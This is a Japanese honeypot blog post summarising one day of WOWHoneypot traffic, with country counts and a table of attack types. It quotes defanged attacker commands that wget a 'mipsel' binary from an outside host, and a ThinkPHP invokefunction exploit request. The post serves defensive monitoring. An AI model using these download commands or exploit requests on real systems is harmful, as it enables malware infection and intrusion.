23log

WOWHoneypotで観測した日々のログをつらつらと

トップ > Honeypot > WOWHoneypot観察(243日目)

WOWHoneypot観察(243日目)

Honeypot

2019/11/14(木)

トータルは8081件でした。

ハンティングログは以下です。

73.34.42[.]204 wget+hxxp[:]//185.172.110[.]220/mipsel
80.200.91[.]85 wget+hxxp[:]//185.172.110[.]220/mipsel
47.40.72[.]233 wget+hxxp[:]//185.172.110[.]220/mipsel
47.40.72[.]233 wget+hxxp[:]//185.172.110[.]220/mipsel
47.40.72[.]233 wget+hxxp[:]//185.172.110[.]220/mipsel

www.virustotal.com
www.virustotal.com

IPのロケーション別の件数は以下です。

アルゼンチン 4003
イタリア 4002
アメリ 21
オランダ 11
ブラジル 10
インド 5
インドネシア 5
ドイツ 4
ロシア 3
イラン 2
中国 2
トルコ 2
ポーランド 2
チェコ 1
ベルギー 1
ウクライナ 1
エクアドル 1
スイス 1
南アフリカ 1
シンガポール 1
タンザニア 1

f:id:sec23:20191130002427p:plain

件数 概要 リクエス
8005 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
59 アクセス GET /
5 Linksys ルータの E シリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
5 ログインページへの通信 POST /Login.htm
2 調査 GET /script
1 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
1 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 Strutsの調査 GET /LoginPage.do